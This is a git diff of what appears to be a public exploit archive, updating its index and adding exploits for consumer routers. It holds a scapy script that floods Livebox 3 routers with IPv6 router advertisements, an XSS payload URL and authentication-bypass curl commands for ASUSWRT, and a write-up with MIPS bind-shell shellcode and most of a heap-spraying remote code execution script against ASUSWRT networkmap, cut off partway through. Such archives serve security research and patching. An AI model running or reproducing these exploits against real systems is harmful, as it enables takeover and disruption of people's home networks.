diff --git a/files.csv b/files.csv
index 84517b257..4699d218c 100644
--- a/files.csv
+++ b/files.csv
@@ -5388,6 +5388,7 @@ id,file,description,date,author,platform,type,port
41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
+41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -14908,7 +14909,7 @@ id,file,description,date,author,platform,type,port
37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia - Remote Code Execution (Metasploit) (2)",2015-07-13,Metasploit,multiple,remote,617
37611,platforms/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,windows,remote,0
37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote,0
-37647,platforms/multiple/remote/37647.txt,"Apache Struts2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
+37647,platforms/multiple/remote/37647.txt,"Apache Struts 2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote,0
37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0
37688,platforms/php/remote/37688.txt,"PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0
37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)",2015-07-21,Metasploit,java,remote,0
@@ -15926,10 +15927,10 @@ id,file,description,date,author,platform,type,port
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
-41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
-41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
+41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux - TCP Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0
+41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
-41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
+41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
@@ -25294,7 +25295,7 @@ id,file,description,date,author,platform,type,port
19381,platforms/php/webapps/19381.php,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution",2012-06-23,EgiX,php,webapps,0
18322,platforms/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,php,webapps,0
18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0
-18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
+18329,platforms/multiple/webapps/18329.txt,"Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0
18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0
18335,platforms/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0
18338,platforms/php/webapps/18338.txt,"phpMyDirectory.com 1.3.3 - SQL Injection",2012-01-08,Serseri,php,webapps,0
@@ -37469,3 +37470,21 @@ id,file,description,date,author,platform,type,port
41552,platforms/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41553,platforms/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
41554,platforms/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",multiple,webapps,0
+41556,platforms/php/webapps/41556.txt,"Country on Sale Script - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41557,platforms/php/webapps/41557.txt,"Media Search Engine Script - 'search' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41558,platforms/php/webapps/41558.txt,"Soundify 1.1 - 'tid' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41559,platforms/php/webapps/41559.txt,"BistroStays 3.0 - 'guests' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41560,platforms/php/webapps/41560.txt,"Nlance 2.2 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41561,platforms/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41562,platforms/php/webapps/41562.txt,"Fashmark 1.2 - 'category' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41563,platforms/php/webapps/41563.txt,"TradeMart 1.1 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41564,platforms/php/webapps/41564.php,"Drupal 7.x Module Services - Remote Code Execution",2017-03-09,"Charles Fol",php,webapps,0
+41566,platforms/php/webapps/41566.txt,"WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",php,webapps,0
+41567,platforms/php/webapps/41567.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41568,platforms/php/webapps/41568.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",php,webapps,0
+41569,platforms/php/webapps/41569.txt,"WordPress Plugin PICA Photo Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0
+41570,platforms/linux/webapps/41570.py,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution",2017-03-07,"Vex Woo",linux,webapps,0
+41571,platforms/hardware/webapps/41571.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
+41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
+41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
+41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
diff --git a/platforms/hardware/dos/41565.py b/platforms/hardware/dos/41565.py
new file mode 100755
index 000000000..bea26bd58
--- /dev/null
+++ b/platforms/hardware/dos/41565.py
@@ -0,0 +1,50 @@
+#!/usr/bin/python
+
+# Exploit Title: CVE-2017-6552 - Local DoS Buffer Overflow Livebox 3
+# Date: 09/03/2017
+# Exploit Author: Quentin Olagne
+# Vendor Homepage: http://www.orange.fr/
+# Version: SG30_sip-fr-5.15.8.1
+# Tested on: Livebox 3 - Sagemcom
+# CVE : CVE-2017-6552
+
+'''
+Livebox router has its default IPv6 routing table max. size too
+small and therefore can be filled within minutes.
+An attacker can exploit this issue to render the affected system
+unresponsive, resulting in a denial-of-service condition for Phone,
+Internet and TV services.
+
+Vulenrability has been discovered in April '16 and has been patched some time ago with the newest firmware.
+I have submitted the idea to have a button to enable/disable IPv6 stack on the local interface from the admin
+livebox web UI, don't know if it's been implemented.
+
+'''
+
+from scapy.all import *
+import time
+import threading
+
+start_time = time.time()
+
+def printit():
+ threading.Timer(5.0, printit).start()
+ interval = time.time() - start_time
+ print 'Total time in seconds:', interval, '\n'
+
+printit()
+
+packet = Ether() \
+ /IPv6() \
+ /ICMPv6ND_RA() \
+ /ICMPv6NDOptPrefixInfo(prefix=RandIP6(),prefixlen=64) \
+ /ICMPv6NDOptSrcLLAddr(lladdr=RandMAC("00:01:42"))
+
+try:
+ sendp(packet,loop=1)
+except KeyboardInterrupt:
+ stored_exception=sys.exc_info()
+except:
+ pass
+
+print "Goodbye"
diff --git a/platforms/hardware/webapps/41571.txt b/platforms/hardware/webapps/41571.txt
new file mode 100755
index 000000000..370c07f3d
--- /dev/null
+++ b/platforms/hardware/webapps/41571.txt
@@ -0,0 +1,22 @@
+Cross-Site Scripting (XSS)
+
+Component: httpd
+
+CVE: CVE-2017-6547
+
+Vulnerability:
+
+httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.
+
+...
+
+if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
+{
+ char inviteCode[256];
+ snprintf(inviteCode, sizeof(inviteCode), "", file);
+ send_page( 200, "OK", (char*) 0, inviteCode, 0);
+
+...
+PoC:
+
+http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A
diff --git a/platforms/hardware/webapps/41572.txt b/platforms/hardware/webapps/41572.txt
new file mode 100755
index 000000000..8fb6ef734
--- /dev/null
+++ b/platforms/hardware/webapps/41572.txt
@@ -0,0 +1,56 @@
+Session Stealing
+
+Component: httpd
+
+CVE: CVE-2017-6549
+
+Vulnerability:
+
+httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.
+
+asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
+{
+ asus_token_t *ptr = head;
+ asus_token_t *tmp = NULL;
+ int found = 0;
+ char *cp = NULL;
+
+ while(ptr != NULL)
+ {
+ if(!strncmp(token, ptr->token, 32)) {
+ found = 1;
+ break;
+ }
+ else if(strncmp(token, "cgi_logout", 10) == 0) {
+ cp = strtok(ptr->useragent, "-");
+
+ if(strcmp(cp, "asusrouter") != 0) {
+ found = 1;
+ break;
+ }
+ }
+ else {
+ tmp = ptr;
+ ptr = ptr->next;
+ }
+ }
+
+ if(found == 1) {
+ if(prev)
+ *prev = tmp;
+ return ptr;
+ }
+ else {
+ return NULL;
+ }
+}
+If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.
+
+PoC:
+
+# read syslog
+curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt
+
+#reboot router
+curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
+It’s possible to execute arbitrary commands on the router if any admin session is currently active.
\ No newline at end of file
diff --git a/platforms/hardware/webapps/41573.txt b/platforms/hardware/webapps/41573.txt
new file mode 100755
index 000000000..5f58b9b5a
--- /dev/null
+++ b/platforms/hardware/webapps/41573.txt
@@ -0,0 +1,440 @@
+Remote Code Execution
+
+Component: networkmap
+
+CVE: CVE-2017-6548
+
+networkmap is responsible for generating a map of computers connected to the router. It continuously monitors the LAN to detect ARP requests submitted by unknown computers. When a new MAC address appears it will probe the related IP address for running services like printer sharing, http server and also iTunes servers.
+
+This is implemented by sending out multicast SSP discoveries:
+
+M-SEARCH * HTTP/1.1
+HOST: 239.255.255.250:1900
+ST:upnp:rootdevice
+MAN:"ssdp:discover"
+MX:3
+A device can then respond with messages which indicate the location of the iTunes service.
+
+HTTP/1.1 200 OK
+Location:HTTP://host:port/path
+Vulnerability:
+
+The function process_device_repsonse is responsible for parsing the SSDP answer:
+
+
+/************************************************************************************************/
+// process the device response "HTTP/1.1 200 OK"
+int process_device_response(char *msg)
+{
+ char *line, *body, *p; // temporary variables
+ char *location = NULL; // the LOCATION: header
+ char host[16], port[6]; // the ip and port of the device
+ ushort destport; // the integer type of device port
+ char *data = NULL; // the data in packet
+ int http_fd; // the http socket fd
+ int nbytes; // recv number
+ int i;
+ char *descri = NULL;
+ int len;
+ struct timeval timeout={10, 0};
+
+ //search "\r\n\r\n" or "\r\n" first appear place and judge whether msg have blank.
+ if( (body = strstr(msg, "\r\n\r\n")) != NULL)
+ body +=4;
+ else if ( (body = strstr(msg, "\r\n")) != NULL)
+ body +=2;
+ else
+ return 0;
+
+ p = msg;
+ // find the LOCATION information.
+ while( p!= NULL && p < body)
+ {
+ line = strsep(&p, "\r\n"); //divide up string
+ if((strncmp(line, "LOCATION:", 9) == 0) || (strncmp(line, "Location:", 9) == 0))
+ {
+ location = strip_chars(&line[9], "\t");
+ location = strip_chars(&line[9], " ");
+ break;
+ }
+ }
+ NMP_DEBUG_F("UPnP location=%s\n", location);
+ //fprintf(fp_upnp, "UPnP location=%s\n", location);//Yau
+ // get the destination ip
+ location += 7;
+ i = 0;
+ while( (*location != ':') && (*location != '/')) {
+ host[i] = *location++;
+ i++;
+ }
+ host[i] = '\0';
+ //get the destination port
+ if(*location == ':') {
+ for(location++, i =0; *location != '/'; i++)
+ port[i] = *location++;
+ port[i] = '\0';
+ destport = (ushort)atoi(port);
+ }
+ else
+ destport = 80;
+It contains multiple buffer overflows in the parsing code for host and port. This stack-based overflow can be used to gain control over networkmap’s control flow by overwriting the saved $pc stored on the stack.
+
+Parsing this message:
+
+HTTP/1.1 200 OK
+Location:HTTP://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
+will overflow host[16] and lead to $pc being set to 0x41414141 which is a starting point for further exploitation.
+
+Exploitation:
+
+In order to develop a working exploit we gather further information of the system.
+
+General Information:
+
+ASUSWRT is based on Linux which is running on a little endian MIPS CPU. The vulnerable program networkmap gets automatically started when the device boots and additionally gets restarted by the watchdog process if it crashes.
+
+# cat /proc/cpuinfo
+system type : MT7620
+processor : 0
+cpu model : MIPS 24Kc V5.0
+BogoMIPS : 386.04
+wait instruction : yes
+microsecond timers : yes
+tlb_entries : 32
+extra interrupt vector : yes
+hardware watchpoint : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8]
+ASEs implemented : mips16 dsp
+shadow register sets : 1
+core : 0
+VCED exceptions : not available
+VCEI exceptions : not available
+
+# ps
+ PID USER VSZ STAT COMMAND
+ 1 admin 3940 S /sbin/init
+ 2 admin 0 SW [kthreadd]
+ 3 admin 0 SW [ksoftirqd/0]
+ 4 admin 0 SW [kworker/0:0]
+ 5 admin 0 SW [kworker/u:0]
+ 6 admin 0 SW< [khelper]
+ 7 admin 0 SW [sync_supers]
+ 8 admin 0 SW [bdi-default]
+ 9 admin 0 SW< [kintegrityd]
+ 10 admin 0 SW< [kblockd]
+ 11 admin 0 SW [kswapd0]
+ 12 admin 0 SW [fsnotify_mark]
+ 13 admin 0 SW< [crypto]
+ 17 admin 0 SW [mtdblock0]
+ 18 admin 0 SW [mtdblock1]
+ 19 admin 0 SW [mtdblock2]
+ 20 admin 0 SW [mtdblock3]
+ 21 admin 0 SW [mtdblock4]
+ 22 admin 0 SW [mtdblock5]
+ 23 admin 0 SW [kworker/u:1]
+ 30 admin 0 SW [kworker/0:1]
+ 41 admin 660 S hotplug2 --persistent --no-coldplug
+ 76 admin 3924 S console
+ 78 admin 1276 S /sbin/syslogd -m 0 -S -O /tmp/syslog.log -s 256 -l 6
+ 80 admin 1276 S /sbin/klogd -c 5
+ 82 admin 1292 S /bin/sh
+ 115 admin 0 SW [RtmpCmdQTask]
+ 116 admin 0 SW [RtmpWscTask]
+ 135 admin 0 SW [RtmpCmdQTask]
+ 136 admin 0 SW [RtmpWscTask]
+ 164 admin 3932 S /sbin/wanduck
+ 168 admin 1128 S dropbear -p 192.168.1.1:22 -a
+ 175 admin 3932 S wpsaide
+ 189 nobody 1056 S dnsmasq --log-async
+ 194 admin 2588 S avahi-daemon: running [RT-AC53-B8F4.local]
+ 196 admin 4112 S httpd -i br0
+ 197 admin 1068 S /usr/sbin/infosvr br0
+ 199 admin 3932 S watchdog
+ 201 admin 2180 S rstats
+ 210 admin 1160 S lld2d br0
+ 211 admin 3932 S ots
+ 224 admin 800 S miniupnpd -f /etc/upnp/config
+ 229 admin 1284 S /sbin/udhcpc -i vlan2 -p /var/run/udhcpc0.pid -s /tmp/udhcpc -O33 -O249
+ 302 admin 1152 S dropbear -p 192.168.1.1:22 -a
+ 303 admin 1300 S -sh
+ 344 admin 1128 S networkmap
+ 359 admin 1280 R ps
+
+# uname -a
+Linux (none) 2.6.36 #1 Fri Sep 23 12:05:55 CST 2016 mips GNU/Linux
+Memory Map:
+
+networkmap’s memory map is analyzed to continue exploiting the device.
+
+# cat /proc/$(pidof networkmap)/maps
+00400000-0040b000 r-xp 00000000 1f:04 270 /usr/sbin/networkmap
+0041a000-0041b000 rw-p 0000a000 1f:04 270 /usr/sbin/networkmap
+0041b000-0041f000 rwxp 00000000 00:00 0 [heap]
+2b893000-2b894000 rw-p 00000000 00:00 0
+2b894000-2b89a000 r-xp 00000000 1f:04 828 /lib/ld-uClibc.so.0
+2b89a000-2b8a0000 rw-s 00000000 00:04 0 /SYSV000003e9 (deleted)
+2b8a0000-2b8a4000 rw-s 00000000 00:04 32769 /SYSV000003ea (deleted)
+2b8a9000-2b8aa000 r--p 00005000 1f:04 828 /lib/ld-uClibc.so.0
+2b8aa000-2b8ab000 rw-p 00006000 1f:04 828 /lib/ld-uClibc.so.0
+2b8ab000-2b8d9000 r-xp 00000000 1f:04 258 /usr/lib/libshared.so
+2b8d9000-2b8e8000 ---p 00000000 00:00 0
+2b8e8000-2b8eb000 rw-p 0002d000 1f:04 258 /usr/lib/libshared.so
+2b8eb000-2b8ed000 rw-p 00000000 00:00 0
+2b8ed000-2b8ef000 r-xp 00000000 1f:04 235 /usr/lib/libnvram.so
+2b8ef000-2b8ff000 ---p 00000000 00:00 0
+2b8ff000-2b900000 rw-p 00002000 1f:04 235 /usr/lib/libnvram.so
+2b900000-2b90e000 r-xp 00000000 1f:04 760 /lib/libgcc_s.so.1
+2b90e000-2b91e000 ---p 00000000 00:00 0
+2b91e000-2b91f000 rw-p 0000e000 1f:04 760 /lib/libgcc_s.so.1
+2b91f000-2b95a000 r-xp 00000000 1f:04 827 /lib/libc.so.0
+2b95a000-2b96a000 ---p 00000000 00:00 0
+2b96a000-2b96b000 rw-p 0003b000 1f:04 827 /lib/libc.so.0
+2b96b000-2b96f000 rw-p 00000000 00:00 0
+2b970000-2b97f000 r--s 03eb0000 00:0c 78 /dev/nvram
+7f8a7000-7f8c8000 rwxp 00000000 00:00 0 [stack]
+7fff7000-7fff8000 r-xp 00000000 00:00 0 [vdso]
+Observations:
+
+Partial ASLR is activated:
+
+Stack address is randomized
+Library addresses are randomized
+Program address is not randomized
+Heap address is not randomized
+There is no Stack-Protector
+
+Both heap and stack are mapped executable
+
+The binary contains almost no gadgets suitable for building a ROP chain
+
+Exploit:
+
+The final exploit consists of the following steps:
+
+Starting a webserver serving shellcode
+Listening for multicast UDP messages send by the router
+Database clearing / crashing: to make the heap layout predictable
+Randomizing MAC address
+Send message: jump to gadget that deletes networkmap’s database and crashes
+networkmap will be restarted
+Spraying heap 1, 2:
+Randomizing MAC address
+Send message: containing the webserver’s IP+port
+networkmap will receive shellcode and store it on the heap
+Starting payload
+Randomize MAC address
+Send message: jump to heap address containing the shellcode
+Connect to opened shell
+For further details check out the full exploit: networkmap-pwn.py (https://bierbaumer.net/networkmap-pwn.py)
+
+Example:
+
+# ./networkmap-pwn.py
+[-] starting webserver
+[-] received SSP discovery
+[-] clearing database and crashing
+[-] received SSP discovery
+[-] spraying heap 1/2
+[-] got shellcode request
+[-] sending shellcode
+[-] received SSP discovery
+[-] spraying heap 2/2
+[-] received SSP discovery
+[-] starting payload
+[-] try to connect to shell
+[-] try to connect to shell
+[+] connected
+Linux (none) 2.6.36 #1 Fri Sep 23 12:05:55 CST 2016 mips GNU/Linux
+[+] pwned
+
+
+
+
+---networkmap-pwn.py---
+#!/usr/bin/env python3
+# ASUSWRT networkmap Remote Code Execution
+# Author: Bruno Bierbaumer
+# Date: 24/02/2017
+# Tested version:
+# RT-AC53 (3.0.0.4.380.6038)
+# CVE: TODO
+
+# Description:
+# networkmap contains a stack-based buffer overflow which can be exploited to run arbitrary code.
+
+
+ROUTER_IP = '192.168.1.1'
+IP = '192.168.1.2'
+INTERACE = 'enp0s31f6'
+
+"""
+ Shellcode adjusted from https://www.exploit-db.com/exploits/13298/
+"""
+
+sc = b"\x41\x41\x04\x28" *1400 # nops
+#alarm handling
+sc += b"\xff\xff\x04\x28" # a0 <- 0 */
+sc += b"\xbb\x0f\x02\x24" # li v0,4027 ( __alarm ) */
+sc += b"\x0c\x01\x01\x01" # syscall
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+#/alarm
+sc += b"\xe0\xff\xbd\x27" # addiu sp,sp,-32 */
+sc += b"\xfd\xff\x0e\x24" # li t6,-3 */
+sc += b"\x27\x20\xc0\x01" # nor a0,t6,zero */
+sc += b"\x27\x28\xc0\x01" # nor a1,t6,zero */
+sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
+sc += b"\x57\x10\x02\x24" # li v0,4183 ( __NR_socket ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\xff\xff\x50\x30" # andi s0,v0,0xffff */
+sc += b"\xef\xff\x0e\x24" # li t6,-17 */
+sc += b"\x27\x70\xc0\x01" # nor t6,t6,zero */
+sc += b"\x13\x37\x0d\x24" # li t5,0x3713 (port 0x1337) */
+sc += b"\x04\x68\xcd\x01" # sllv t5,t5,t6 */
+sc += b"\xff\xfd\x0e\x24" # li t6,-513 */
+sc += b"\x27\x70\xc0\x01" # nor t6,t6,zero */
+sc += b"\x25\x68\xae\x01" # or t5,t5,t6 */
+sc += b"\xe0\xff\xad\xaf" # sw t5,-32(sp) */
+sc += b"\xe4\xff\xa0\xaf" # sw zero,-28(sp) */
+sc += b"\xe8\xff\xa0\xaf" # sw zero,-24(sp) */
+sc += b"\xec\xff\xa0\xaf" # sw zero,-20(sp) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\xef\xff\x0e\x24" # li t6,-17 */
+sc += b"\x27\x30\xc0\x01" # nor a2,t6,zero */
+sc += b"\xe0\xff\xa5\x23" # addi a1,sp,-32 */
+sc += b"\x49\x10\x02\x24" # li v0,4169 ( __NR_bind ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\x01\x01\x05\x24" # li a1,257 */
+sc += b"\x4e\x10\x02\x24" # li v0,4174 ( __NR_listen ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\xff\xff\x05\x28" # slti a1,zero,-1 */
+sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
+sc += b"\x48\x10\x02\x24" # li v0,4168 ( __NR_accept ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\xff\xff\x50\x30" # andi s0,v0,0xffff */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\xfd\xff\x0f\x24" # li t7,-3 */
+sc += b"\x27\x28\xe0\x01" # nor a1,t7,zero */
+sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\x01\x01\x05\x28" # slti a1,zero,0x0101 */
+sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x25\x20\x10\x02" # or a0,s0,s0 */
+sc += b"\xff\xff\x05\x28" # slti a1,zero,-1 */
+sc += b"\xdf\x0f\x02\x24" # li v0,4063 ( __NR_dup2 ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\x50\x73\x06\x24" # li a2,0x7350 */
+sc += b"\xff\xff\xd0\x04" # LB: bltzal a2,LB */
+sc += b"\x50\x73\x0f\x24" # li t7,0x7350 (nop) */
+sc += b"\xff\xff\x06\x28" # slti a2,zero,-1 */
+sc += b"\xdb\xff\x0f\x24" # li t7,-37 */
+sc += b"\x27\x78\xe0\x01" # nor t7,t7,zero */
+sc += b"\x21\x20\xef\x03" # addu a0,ra,t7 */
+sc += b"\xf0\xff\xa4\xaf" # sw a0,-16(sp) */
+sc += b"\xf4\xff\xa0\xaf" # sw zero,-12(sp) */
+sc += b"\xf0\xff\xa5\x23" # addi a1,sp,-16 */
+sc += b"\xab\x0f\x02\x24" # li v0,4011 ( __NR_execve ) */
+sc += b"\x0c\x01\x01\x01" # syscall */
+sc += b"/bin/sh";
+
+
+import time
+import struct
+import socket
+import sys
+import os
+import threading
+import socketserver
+import telnetlib
+
+# randomize mac address
+def mac():
+ os.system('macchanger -A {} > /dev/null'.format(INTERACE))
+
+# setup interface
+os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {}'.format(INTERACE, INTERACE, IP, ROUTER_IP))
+
+
+# setup minimal webserver for delivering the shellcode
+class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):
+
+ def handle(self):
+ print('[-] got shellcode request')
+ self.request.recv(1024)
+ print("[-] sending shellcode")
+ self.request.send(sc)
+
+class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
+ pass
+
+print('[-] starting webserver')
+socketserver.TCPServer.allow_reuse_address = True
+server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
+t = threading.Thread(target=server.serve_forever)
+t.start()
+
+# start multicast receiver
+addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
+s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
+s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+s.bind(('', 1900))
+group_bin = socket.inet_pton(addrinfo[0], addrinfo[4][0])
+mreq = group_bin + struct.pack('=I', socket.INADDR_ANY)
+s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
+
+mac()
+state = 'clean'
+
+while True:
+ data, sender = s.recvfrom(1500)
+
+ if sender[0] == ROUTER_IP and sender[1] == 1008:
+ print("[-] received SSP discovery")
+
+ data = {}
+ data['clean'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + b'CCCC'*11 + b'\xfc\x8c\x40/' +b'\r\n\r\n'
+ data['pwn'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + b"AAAA"*11 + b'\x04\xd5\x41/' +b'\r\n\r\n'
